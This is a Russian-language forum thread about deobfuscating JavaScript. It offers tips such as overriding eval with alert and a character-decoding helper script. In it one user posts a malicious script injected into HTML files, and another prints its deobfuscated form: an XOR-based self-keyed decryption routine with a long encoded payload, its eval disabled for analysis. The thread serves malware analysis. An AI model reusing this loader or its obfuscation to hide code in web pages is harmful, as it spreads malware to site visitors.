Расшифровка Js

Пожалуйста расшифруйте JS-скрипт http://www.voland-lab.com/js.txt
Он же eCardMax HotEditor. Если у кого есть, поделитесь.

 

Помогите купить квартиру

 

это исис так с темы съехал.. не смог расшифровать видемо =)))

 

интересно все зашкерено, ТС ты знаешь что код то делает хотяб ?

 

блин, я имею ввиду код по ссылке из первого поста, что там закодировано ты знаешь ?

 

улыбнуло Исис +1. Жжоте

[x26]VOLAND, юзай энтер )))

 

обьясняю. Он не зашифрован ничем, его ненадо расшифровывать. И вобще я не слышал, чтобы JavaScript шифровали.. он же работать не будет.

Просто немножко павтыкай в код, сделав его немного красивее. Возьми шнягу какую-нибудь, которая подсвечивает скобки и прочую гадость. NotePad++ к примеру.

 

[x26]VOLAND,
http://dump.ru/files/o/o2544149176/
пасс "_antichat.ru"

Midas, ну-ну.

 

ок, обоснуйте мне что я не прав. Если это так, спотить не стану.

 

Code:

Просто немножко павтыкай в код, сделав его немного красивее. Возьми шнягу какую-нибудь, которая подсвечивает скобки и прочую гадость. NotePad++ к примеру.

Если [x26]VOLAND попросил помочь, значит он считает, что пока недостаточно уверенно ориентируется в JS чтобы сделать это самостоятельно.
Стоит ли советовать ему "немного повтыкать в код, сделав его красивее"?
P.S. Сравни исходный файл (последний кусок обфусцирован) и результат.

 

ого. Честно говоря для меня теперь загадка, каким ху.. образом браузер это интерпретирует 0_о

 

Пасип, суть понял, прочитав описание метода eval()

Ну не кодер я Пробовал, знаком, кое чего даже могу, но не кодер..увы

 

http://dump.ru/files/o/o601039227/
пасс тот же

Приводится в читаемый вид довольно просто (не сложно догадаться, что я использовал textarea, а там был закрывающий тэг), тем более, что используется всем известный пакер.

P.S. иногда бывает полезно переписать стандартные функции, чтобы не заменять в коде каждый их вызов,например так:

Code:

eval = function(s)
{
  alert(s);
}

Конечно, это нужно делать до запуска исследуемого скрипта.
P.P.S А чтобы было сложно разобраться в коде, не "шифруйте" скрипты за счёт работы со строками и всяких преобразований - это бессмысленно.
Используйте прототипирование. Очень полезно.
И сразу становится проще самому написать.

 

Пожалуйста расшифруйте JS-скрипт

http://dump.ru/file_catalog/958568

 

dx4r,

Code:

<script type="text/javascript">
function decodetest(){
//get the input
  var t = document.getElementById('dectest').value;
//remove carriage returns
  t = t.replace(new RegExp("\\=\r\n","gim"), "");
//replace urlencoded values
  t = unescape(t);
//replacement values
  var thechrs = new Array(
    ' ','!','"','#','$','%','&',"'",'(',')','*','+',',','-','.','/','0','1','2','3',
    '4','5','6','7','8','9',':',';','<','=','>','?','@','A','B','C','D','E','F','G', 
    'H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','[', 
    '\\',']','^','_','`','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
    'p','q','r','s','t','u','v','w','x','y','z','{','|','}','~',' ','c','u','e','a',
    'a','a','a','c','e','e','e','i','i','i','a','a','e','ae','ae','o','o','o','u','u',
    'y','u','u','o','l','0','x','f','a','i','o','u','n','n','*','O','?','r','_','?',
    '?','!','<','>','_','_','_','|','|','a','a','a','c','|','|','+','+','c','y','+',
    '+','-','-','+','-','+','a','a','+','+','-','-','|','-','+','.','.','d','e','e',
    'e','i','i','i','i','+','+','_','_','|','i','_','o','o','o','o','o','o','u','p',
    'p','u','u','u','y','y','_',"'",'-','?','_','?','?','S','÷','¸','°','¨','·','¹',
    '³','²','_',' ');
//replace js numeric array values
  var l = 32;
  for (l = 32; l < 256; l++){
    t = t.replace(new RegExp("\\[" + l + ",","gim"),"[" + thechrs[l-32] + ",");
    t = t.replace(new RegExp("\\[" + l + ",","gim"),"[" + thechrs[l-32] + ",");
  }
  for (l = 32; l < 256; l++){
    t = t.replace(new RegExp("," + l + "\\]","gim"),"," + thechrs[l-32] + "]");
    t = t.replace(new RegExp("," + l + "\\]","gim"),"," + thechrs[l-32] + "]");
  }
  for (l = 32; l < 256; l++){
    t = t.replace(new RegExp("," + l + ",","gim"),"," + thechrs[l-32] + ",");
    t = t.replace(new RegExp("," + l + ",","gim"),"," + thechrs[l-32] + ",");
  }
  ta = t;
  t = t.replace(new RegExp("(\\[[^\\]]+)\\,([^\\]]+\\])","gim"), "$1$2");
  while(ta !== t){
    ta = t;
    t = t.replace(new RegExp("(\\[[^\\]]+)\\,([^\\]]+\\])","gim"), "$1$2");
  }
//replace entities
  var l = 32;
  for (l = 32; l < 100; l++){
    t = t.replace(new RegExp("&#" + l + ";","gim"),thechrs[l-32]);
    t = t.replace(new RegExp("&#0" + l + ";","gim"),thechrs[l-32]);
    t = t.replace(new RegExp("&#00" + l + ";","gim"),thechrs[l-32]);
  }
  var l = 100;
  for (l = 100; l < 256; l++){
    t = t.replace(new RegExp("&#" + l + ";","gim"),thechrs[l-32]);
    t = t.replace(new RegExp("&#0" + l + ";","gim"),thechrs[l-32]);
  }
//return results
  document.getElementById("parsed").innerHTML = t;
}
</script>

 

n0ne, а как вы ево расшифровали, и почему он в таком виде не работает?

 

А кто вот этот вирусок расшифрует? Прикрепляется в конец файла ****
Вот как он выглядит (вырезал середину):

HTML:

<!-- [ 4455e927ffa4408f4d13cbdc18c9a79d ] --><script>eval('\x66\x75\x6e\x63\x74\x69\x6f\ ... x37\x64\x27\x29\x3b');</script><!-- end -->

http://ifolder.ru/7042045
http://rapidshare.com/files/123665937/virus_help_.rar
http://depositfiles.com/files/6091668

 

Замени eval на alert

Code:

function wFh (gBZfU) {
  function aVET (uEeYZ) {
    var wzflAe = 0;
    var huL = uEeYZ.length;
    var eEUIOL = 0;
    while (eEUIOL < huL) {
      wzflAe += gIsqvl (uEeYZ, eEUIOL) * huL;
      eEUIOL++;
    }
    return (wzflAe + '');
  }

  function gIsqvl (nOI, ierOXSV) {
    return nOI.charCodeAt (ierOXSV);
  }

  try {
    var jGMOy = eval ('aDrzgouzmoefnDtfso.fcfaDlolzebeo'.replace (/[fzoDb]/g, ''));
    var whT = new String ();
    var gDI = 0;
    yQyUmy = 0, vTkBMe = (new String(jGMOy)).replace(/[^@a-z0-9A-Z_.,-]/g,'');
    var tDGIej = aVET (vTkBMe);
    gBZfU = unescape (gBZfU);
    for (var mGtHBvkh = 0; mGtHBvkh < (gBZfU.length); mGtHBvkh++){
      var hFgH = gIsqvl (vTkBMe,gDI) ^ gIsqvl (tDGIej, yQyUmy);
      var qKpcSA = gIsqvl (gBZfU, mGtHBvkh);
      yQyUmy++;
      gDI++;
      if (yQyUmy > tDGIej.length)
        yQyUmy = 0;
      if (gDI > vTkBMe.length)
        gDI = 0;
      whT += String.fromCharCode (qKpcSA ^ hFgH);
    }
    alert (escape(whT)); //добавлено мной
    //eval(whT);  // закоментировано тоже мной :)
    return whT = new String();
  } catch (e){}
}
wFh ('%33%33%36%37%36%33%36%32%57%3b%09%79%5c%17%28%58%1a%27%73%20%30%31%2d%32%23%1d%35%02%66%4e%72%14%0e%25%27%34%36%28%3d%3e%22%04%4a%64%5b%61%3d%36%15%20%02%3a%04%34%35%76%28%2f%30%35%7e%20%0d%29%6b%17%0d%1c%09%17%67%19%2f%74%36%3d%30%17%17%12%20%11%75%2b%14%32%3d%6b%7e%33%33%20%0a%36%29%65%78%2f%31%22%1a%4e%30%74%4c%4c%54%68%54%73%6b%1f%3f%1e%43%46%72%5f%66%74%63%3f%3d%78%21%16%3d%7f%4a%6f%70%61%2d%3f%10%3f%3a%31%3e%1a%24%60%6d%4c%62%5c%0b%73%36%25%6a%1a%3d%14%37%25%3c%26%15%30%2e%07%12%1d%30%7d%7e%68%64%56%48%7e%76%5c%63%3b%3a%2c%53%2a%05%15%2e%24%2c%20%77%68%45%2f%20%18%63%29%75%7a%67%4f%5a%1c%63%7c%7e%68%6b%76%41%24%30%28%1f%23%36%20%7d%06%7a%0c%7e%7d%5d%73%7e%70%5d%7f%71%73%73%38%63%7d%60%4c%79%70%27%39%25%2f%5c%37%02%6b%17%36%2b%25%08%16%2e%0c%2a%07%6a%6c%7f%76%71%66%4f%63%74%59%5e%72%22%0e%38%7b%36%25%75%6f%60%4c%7d%04%25%3f%2e%7d%30%04%33%2c%60%13%78%3e%14%0e%2b%2b%76%24%36%37%2d%3e%3a%34%53%6d%3f%1c%76%70%6c%02%72%06%07%34%05%65%22%7b%33%77%2d%7f%47%71%56%35%61%71%50%06%53%1d%66%01%42%0b%66%08%44%35%62%7d%71%04%6b%34%6c%0b%27%0e%05%01%0a%09%06%75%39%6c%22%44%66%70%03%26%0e%1d%21%3a%0d%2b%71%2a%1a%38%01%1c%71%4d%09%5e%0b%7d%43%3a%7d%7e%42%3b%7a%79%7d%4a%21%11%02%5e%2e%3a%32%76%2d%66%40%6e%21%68%16%7e%2f%6b%74%69%09%40%4c%1d%7d%68%24%15%0c%21%3b%68%0f%21%2f%2a%59%17%17%0a%36%6d%67%2b%2e%12%33%65%04%33%2f%23%13%2b%78%4c%59%04%54%2c%22%2f%3d%20%1c%41%4a%57%33%6a%59%79%09%11%30%1e%29%24%47%21%58%23%63%34%28%08%3f%31%2a%1e%03%0d%2c%0d%26%1b%1d%1b%37%79%22%7e%03%28%3a%21%2b%26%0d%21%4f%44%31%71%3a%25%24%05%11%64%75%70%15%14%31%6d%32%36%32%13%69%38%3e%1c%14%6a%24%74%3d%0e%23%21%26%17%32%30%20%1a%35%2d%5b%3c%38%2e%1e%34%01%18%23%10%22%75%4b%57%7d%7b%73%5b%78%61%23%37%28%29%7a%22%39%2d%29%2d%38%17%3b%38%28%33%68%44%7f%7c%7f%71%56%79%69%3f%78%36%39%45%20%4f%7a%31%03%26%6c%3c%23%47%41%7a%58%0f%10%0d%29%64%72%11%22%2a%35%38%34%00%5b%49%2e%2a%7f%33%11%01%67%26%18%55%32%73%57%75%21%6c%7b%29%06%35%0b%22%1e%3f%4a%56%3c%0a%23%33%32%37%37%2a%39%68%4c%0d%0f%19%50%5b%77%29%33%1a%71%37%3f%00%06%1b%1d%07%21%28%0c%35%2c%3c%33%12%33%4f%53%69%3c%37%3b%34%53%24%64%4b%23%0b%16%0b%13%5d%08%00%66%5c%20%1a%17%59%00%16%1e%3e%22%1b%78%17%18%6b%0c%08%51%3f%73%31%30%20%2a%37%37%3c%3c%06%0b%7d%66%34%34%20%5e%71%7c%37%67%20%49%09%68%19%6a%0d%2b%1c%3b%7b%0f%6a%7c%74%33%0e%21%53%79%0e%16%56%35%07%31%0b%41%06%3d%71%2f%63%61%33%32%31%30%14%2e%19%62%7c%1a%3f%07%18%2a%56%6a%09%76%25%60%7e%7e%70%4f%76%03%2a%38%36%72%7f%31%17%13%20%13%36%3c%0a%1e%1b%4a%7f%77%3a%19%74%07%64%64%5f%78%7a%18%31%5c%37%05%6c%32%33%05%2c%60%07%19%6d%6b%6f%03%6e%71%3d%66%2c%68%36%49%49%2e%24%60%15%2f%13%33%18%60%7a%68%4c%06%25%27%79%2a%0a%7b%52%1e%6b%3d%74%75%4d%53%57%42%3a%6a%38%73%39%1a%33%22%73%18%6a%7a%23%61%58%67%17%75%19%52%72%34%70%17%7a%2b%7f%6c%79%18%5f%0c%17%30%26%05%5a%11%6c%59%36%6c%1d%3a%3e%06%09%7d%4a%7c%13%35%21%21%35%2e%7e%34%59%21%31%09%33%2d%29%20%39%34%43%03%35%17%01%25%70%79%3e%04%1c%69%0a%1c%2d%26%32%7b%7c%2a%69%20%7b%74%39%1b%31%0a%22%1d%4f%6d%59%5f%32%3c%18%29%33%27%3a%58%7b%25%2b%15%6e%01%27%32%1d%48%3a%5c%6d%71%38%78%58%0c%7f%58%7d%01%6a%7c%20%05%1e%0a%37%13%55%14%5c%11%5e%78%65%63%3b%39%36%26%2b%0a%09%51%6f%0b%54%6c%37%3f%20%18%08%33%02%04%71%2f%09%0f%28%1b%2b%79%24%4d%2d%4f%7a%68%73%5b%52%14%21%22%0e%3d%4d%2d%2a%32%07%1b%15%38%34%7d%77%27%34%0e%34%75%2c%09%20%0d%32%2e%7e%3b%38%34%5f%5f%31%0a%30%31%50%35%77%34%38%34%34%10%09%38%02%1a%2e%7a%26%1f%4d%07%24%2e%1b%3f%77%3e%2d%38%4d%4a%7b%31%30%1b%3f%26%3e%1e%16%6b%3b%05%1a%3e%5c%75%3e%37%29%22%3e%68%20%14%21%17%67%22%79%79%2f%3e%15%7c%21%25%14%27%6d%76%66%71%35%4f%34%35%2a%06%5f%38%26%74%0d%22%2d%79%1d%20%01%3b%7d%6b%47%32%06%25%17%34%38%23%41%75%7d%7c%41%4b%51%77%47%55%5a%59%70%7f%7f%64%28%3b%0f%07%3b%63%2f%23%6f%3d%28%23%2d%1f%36%4e%51%3d%34%36%03%31%67%75%61%75%7c%71%57%7e%5a%19%09%64%20%2b%3a%76%13%37%1a%16%1b%50%54%7c%7c%6c%21%31%20%32%05%33%22%46%51%69%21%74%36%1c%11%22%3c%7f%22%04%0a%10%1e%57%77%7c%6c%2b%5a%00%11%16%14%2d%32%3a%27%2c%3d%7a%6b%36%3c%17%04%30%2e%3f%36%65%76%3a%33%08%11%29%22%17%3b%31%0c%1e%16%6b%7a%34%19%1a%08%5a%67%4a%25%2f%3e%31%37%0f%0b%32%00%35%7d%63%09%62%21%32%01%54%35%35%2c%17%53%0e%05%31%52%04%17%7f%6c%67%1b%18%15%16%78%2c%39%28%23%16%28%24%4f%75%7d');</script>

 

Такой вопрос...
h_ttp://www.bananascript.com/index.php?compress

ведь его тоже можно для "шифровки" использовать?

 

Ничего себе археологи... какую темку откопали...
Свою создать было не судьба?